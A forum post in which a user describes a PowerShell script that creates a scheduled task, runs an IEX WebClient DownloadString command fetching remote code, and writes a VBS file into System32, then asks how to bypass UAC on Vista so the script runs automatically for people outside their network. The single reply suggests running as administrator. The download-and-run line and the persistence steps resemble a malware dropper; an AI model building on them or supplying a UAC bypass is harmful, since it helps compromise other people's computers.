Ok, I have a PSH script that does the following things:
- Creates a text file under a user/appdata/local directory
- Creates a scheduled task with the schtasks command
- Runs an IEX (New-Object Net.WebClient).DownloadString('https:\BlahBlah.com') command
- Creates a VBS file under the system32 folder
On Windows 7 and 8, it works fine.
On Windows Vista, steps 1, 2, and 3 work, but 4 fails with an unauthorized access exception. I tried modifying it so that it would only create a txt file instead of VBS (to see if an executable file was the problem), but I get the same error.
It's a UAC thing, I'm sure. But I don't know how to get around it. The PSH script needs user approval to run in the first place, and has no problem making all other changes except for this one thing.
Is there some sort of bypass command I can add in to circumvent the UAC?
Here's what I get when debugging from Powershell ISE:
PS C:\Users\Caitlin> New-Item $env:SystemRoot\System32\Initialize.txt -type file -force
New-Item : Access to the path 'C:\Windows\System32\Initialize.txt' is denied.
At line:1 char:9
+ New-Item <<<< $env:SystemRoot\System32\Initialize.txt -type file -force
+ CategoryInfo : PermissionDenied: (C:\Windows\System32\Initialize.txt:String) [New-Item], UnauthorizedAccessException
+ FullyQualifiedErrorId : NewItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.NewItemCommand
I want this to be relatively automated, because I'll be sharing it with other people outside my network.
I guess the simple solution is to just create it under a different directory, but I'd prefer to have it perform the same as it does on Windows 7/8.
Are you running powershell as administrator(right click>run as administrator)? Also, check the permissions on system32 directory and ensure the account running the script does in fact have write permissions.